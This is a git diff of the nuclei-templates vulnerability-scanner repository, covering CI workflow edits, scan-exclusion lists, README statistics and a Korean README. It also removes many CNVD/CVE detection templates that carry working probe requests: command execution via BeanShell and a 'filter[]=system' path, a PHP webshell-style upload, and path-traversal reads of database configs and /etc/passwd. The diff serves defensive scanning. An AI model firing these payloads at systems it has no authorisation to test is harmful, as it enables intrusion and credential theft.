git add TOP-10.md
|
||||
|
@ -52,4 +56,3 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -0,0 +1,45 @@
|
|||
name: ✨ WordPress Plugins - Update
|
||||
|
||||
on:
|
||||
schedule:
|
||||
- cron: "0 4 * * *" # every day at 4am UTC
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
Update:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Check out repository code
|
||||
uses: actions/checkout@v3
|
||||
with:
|
||||
persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token
|
||||
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
|
||||
|
||||
- name: Install Python3
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.10"
|
||||
- run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
|
||||
|
||||
- name: Update Templates
|
||||
id: update-templates
|
||||
run: |
|
||||
python3 .github/scripts/wordpress-plugins-update.py
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add --all
|
||||
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
|
||||
|
||||
- name: Push changes
|
||||
if: steps.update-templates.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
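Review bot: `git add --all` stages every file in the workspace after the scraper runs, so anything the script or `pip` leaves behind is committed by the daily job; stage only the generated directories, `git add helpers/wordpress/plugins http/technologies/wordpress/plugins`. The job declares no `permissions:` block, and `contents: write` is the only scope the push needs. The `persist-credentials` comment mentions a personal token, but the push step uses `secrets.GITHUB_TOKEN`; reword it so the next maintainer does not assume a PAT is configured.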
|
|
@ -0,0 +1,25 @@
|
|||
http/cves/2021/CVE-2021-37304.yaml
|
||||
http/cves/2021/CVE-2021-37305.yaml
|
||||
http/cves/2022/CVE-2022-22733.yaml
|
||||
http/cves/2022/CVE-2022-2733.yaml
|
||||
http/cves/2023/CVE-2023-1434.yaml
|
||||
http/cves/2023/CVE-2023-25717.yaml
|
||||
http/cves/2023/CVE-2023-2780.yaml
|
||||
http/cves/2023/CVE-2023-29923.yaml
|
||||
http/exposed-panels/interactsoftware-interact.yaml
|
||||
http/exposed-panels/odoo-panel.yaml
|
||||
http/exposed-panels/repetier-server-panel.yaml
|
||||
http/exposed-panels/shardingsphere-panel.yaml
|
||||
http/exposures/apis/jeecg-boot-swagger.yaml
|
||||
http/exposures/configs/blazor-boot.yaml
|
||||
http/exposures/configs/config-properties.yaml
|
||||
http/misconfiguration/sitecore-lfi.yaml
|
||||
http/misconfiguration/teslamate-unauth-access.yaml
|
||||
http/vulnerabilities/avtech/avtech-auth-bypass.yaml
|
||||
http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml
|
||||
http/vulnerabilities/avtech/avtech-unauth-file-download.yaml
|
||||
http/vulnerabilities/avtech/avtech-verification-bypass.yaml
|
||||
http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml
|
||||
http/vulnerabilities/zyxel/unauth-ztp-ping.yaml
|
||||
network/cves/2016/CVE-2016-3510.yaml
|
||||
network/cves/2020/CVE-2020-11981.yaml
|
|
@ -3,6 +3,11 @@
|
|||
#
|
||||
# This is default list of tags and files to excluded from default nuclei scan.
|
||||
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
|
||||
#
|
||||
# ============ DO NOT EDIT ============
|
||||
# Automatically updated by nuclei on execution from nuclei-templates
|
||||
# User changes should be in nuclei config file
|
||||
# ============ DO NOT EDIT ============
|
||||
|
||||
# tags is a list of tags to ignore execution for
|
||||
# unless asked for by the user.
|
||||
|
@ -10,7 +15,23 @@
|
|||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
||||
# Please feel free to create PR if you can update the templates with strict matchers.
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
||||
files:
|
||||
- http/cves/2006/CVE-2006-1681.yaml
|
||||
- http/cves/2007/CVE-2007-5728.yaml
|
||||
- http/cves/2014/CVE-2014-9608.yaml
|
||||
- http/cves/2018/CVE-2018-5233.yaml
|
||||
- http/cves/2019/CVE-2019-14696.yaml
|
||||
- http/cves/2020/CVE-2020-11930.yaml
|
||||
- http/cves/2020/CVE-2020-19295.yaml
|
||||
- http/cves/2020/CVE-2020-2036.yaml
|
||||
- http/cves/2020/CVE-2020-28351.yaml
|
||||
- http/cves/2021/CVE-2021-35265.yaml
|
||||
- http/vulnerabilities/oracle/oracle-ebs-xss.yaml
|
||||
- http/vulnerabilities/other/nginx-module-vts-xss.yaml
|
|
@ -3,7 +3,9 @@ extends: default
|
|||
|
||||
ignore: |
|
||||
.pre-commit-config.yml
|
||||
.github/workflows/*.yml
|
||||
.github/
|
||||
.git/
|
||||
*.yml
|
||||
|
||||
rules:
|
||||
document-start: disable
|
||||
|
@ -15,3 +17,5 @@ rules:
|
|||
require-starting-space: true
|
||||
ignore-shebangs: true
|
||||
min-spaces-from-content: 1
|
||||
empty-lines:
|
||||
max: 5
|
|
@ -24,5 +24,5 @@ I've validated this template locally?
|
|||
|
||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
|
||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
24
README.md
24
README.md
|
@ -41,19 +41,19 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 945 | daffainfo | 434 | cves | 951 | info | 979 | http | 2628 |
|
||||
| lfi | 399 | dhiyaneshdk | 360 | vulnerabilities | 376 | high | 727 | file | 57 |
|
||||
| panel | 377 | pikpikcu | 293 | exposed-panels | 375 | medium | 536 | network | 48 |
|
||||
| xss | 294 | pdteam | 232 | technologies | 213 | critical | 339 | dns | 12 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 197 | low | 172 | | |
|
||||
| exposure | 260 | dwisiswant0 | 159 | misconfiguration | 170 | | | | |
|
||||
| rce | 247 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| tech | 223 | gy741 | 93 | workflows | 86 | | | | |
|
||||
| cve2021 | 207 | 0x_akoko | 91 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
|
||||
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
|
||||
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
|
||||
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
|
||||
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
|
||||
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
|
||||
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
|
||||
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
|
||||
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
|
||||
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
|
||||
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
|
||||
|
||||
**201 directories, 2879 files**.
|
||||
**395 directories, 6435 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,96 @@
|
|||
|
||||
|
||||
<h1 align="center">
|
||||
Nuclei 템플릿
|
||||
</h1>
|
||||
<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
|
||||
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
|
||||
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a> •
|
||||
<a href="#-contributions">기여</a> •
|
||||
<a href="#-discussion">논의</a> •
|
||||
<a href="#-community">커뮤니티</a> •
|
||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
||||
<a href="https://discord.gg/projectdiscovery">디스코드</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a> •
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
|
||||
</p>
|
||||
|
||||
----
|
||||
|
||||
템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
|
||||
이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
|
||||
템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
|
||||
|
||||
## Nuclei 템플릿 개요
|
||||
|
||||
고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
## Nuclei 템플릿 통계 Top 10
|
||||
|
||||
| 태그 | 개수 | 작성자 | 개수 | 디렉토리 | 개수 | 심각도 | 개수 | 종류 | 개수 |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
|
||||
| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
|
||||
| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
|
||||
| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
|
||||
| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
|
||||
| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
|
||||
| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
|
||||
| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
|
||||
| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
|
||||
| tech | 286 | gy741 | 126 | file | 76 | | | | |
|
||||
|
||||
**286개 디렉토리, 4012개 파일**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
📖 문서
|
||||
-----
|
||||
|
||||
새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
|
||||
|
||||
💪 기여
|
||||
-----
|
||||
|
||||
Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
|
||||
[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
|
||||
|
||||
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
|
||||
|
||||
💬 논의
|
||||
-----
|
||||
|
||||
같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
|
||||
[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
|
||||
|
||||
👨💻 커뮤니티
|
||||
-----
|
||||
|
||||
프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
|
||||
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
|
||||
:heart:
|
File diff suppressed because one or more lines are too long
4478
TEMPLATES-STATS.md
File diff suppressed because it is too large
22
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 945 | daffainfo | 434 | cves | 951 | info | 979 | http | 2628 |
|
||||
| lfi | 399 | dhiyaneshdk | 360 | vulnerabilities | 376 | high | 727 | file | 57 |
|
||||
| panel | 377 | pikpikcu | 293 | exposed-panels | 375 | medium | 536 | network | 48 |
|
||||
| xss | 294 | pdteam | 232 | technologies | 213 | critical | 339 | dns | 12 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 197 | low | 172 | | |
|
||||
| exposure | 260 | dwisiswant0 | 159 | misconfiguration | 170 | | | | |
|
||||
| rce | 247 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| tech | 223 | gy741 | 93 | workflows | 86 | | | | |
|
||||
| cve2021 | 207 | 0x_akoko | 91 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
|
||||
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
|
||||
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
|
||||
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
|
||||
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
|
||||
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
|
||||
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
|
||||
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
|
||||
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
|
||||
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
|
||||
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
|
||||
|
|
|
@ -1,29 +0,0 @@
|
|||
id: CNVD-2019-01348
|
||||
|
||||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
|
@ -1,27 +0,0 @@
|
|||
id: CNVD-2019-06255
|
||||
|
||||
info:
|
||||
name: CatfishCMS RCE
|
||||
author: Lark-Lab
|
||||
severity: medium
|
||||
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
|
||||
tags: rce,cnvd,catfishcms,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'OS'
|
||||
- 'PATH'
|
||||
- 'SHELL'
|
||||
- 'USER'
|
||||
condition: and
|
|
@ -1,27 +0,0 @@
|
|||
id: CNVD-2020-23735
|
||||
|
||||
info:
|
||||
name: Xxunchi Local File read
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
condition: and
|
|
@ -1,29 +0,0 @@
|
|||
id: CNVD-2020-56167
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
tags: ruijie,default-login,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
|
||||
headers:
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,31 +0,0 @@
|
|||
id: CNVD-2020-62422
|
||||
|
||||
info:
|
||||
name: Seeyon readfile(CNVD-2020-62422)
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi,cnvd,cnvd2020,seeyon
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-msdownload"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "ctpDataSource.password"
|
||||
condition: and
|
|
@ -1,42 +0,0 @@
|
|||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 Path Traversal
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
tags: weiphp,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
"1":1
|
||||
- |
|
||||
GET /public/index.php/home/file/user_pics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
- |
|
||||
GET {{endpoint}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- '/public/uploads/picture/(.*.jpg)'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- https://weiphp.cn
|
||||
- WeiPHP
|
||||
- DB_PREFIX
|
||||
condition: and
|
|
@ -1,25 +0,0 @@
|
|||
id: CNVD-2021-10543
|
||||
|
||||
info:
|
||||
name: EEA Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
tags: config,exposure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/authenticationserverservlet"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "<username>(.*?)</username>"
|
||||
- "<password>(.*?)</password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,25 +0,0 @@
|
|||
id: CNVD-2021-15822
|
||||
|
||||
info:
|
||||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
tags: shopxo,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,28 +0,0 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
tags: ruijie,disclosure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,43 +0,0 @@
|
|||
id: CNVD-2021-30167
|
||||
|
||||
info:
|
||||
name: UFIDA NC BeanShell Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
tags: beanshell,rce,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
||||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
||||
- "Windows IP"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "BeanShell Test Servlet"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,38 +0,0 @@
|
|||
id: CNVD-2021-49104
|
||||
|
||||
info:
|
||||
name: Pan Micro E-office File Uploads
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://chowdera.com/2021/12/202112200602130067.html
|
||||
tags: pan,micro,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<?php echo md5('CNVD-2021-49104');?>
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4--
|
||||
|
||||
- |
|
||||
GET /images/logo/logo-eoffice.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "94d01a2324ce38a2e29a629c54190f67"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
File diff suppressed because it is too large
|
@ -0,0 +1 @@
|
|||
007505eab9adec1b628522c2675730ee
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2000-0114
|
||||
|
||||
info:
|
||||
name: Microsoft FrontPage Extensions Check (shtml.dll)
|
||||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/_vti_inf.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2001-1473
|
||||
|
||||
info:
|
||||
name: Deprecated SSHv1 Protocol Detection
|
||||
author: iamthefrogy
|
||||
severity: high
|
||||
tags: network,ssh,openssh,cves,cves2001
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
classification:
|
||||
cvss-score: 7.4
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cve-id: CVE-2001-1473
|
||||
cwe-id: CWE-310
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Host}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
|
@ -1,35 +0,0 @@
|
|||
id: CVE-2002-1131
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
reference: https://www.exploit-db.com/exploits/21811
|
||||
tags: xss,squirrelmail,cve,cve2002
|
||||
|
||||
requests:
|
||||
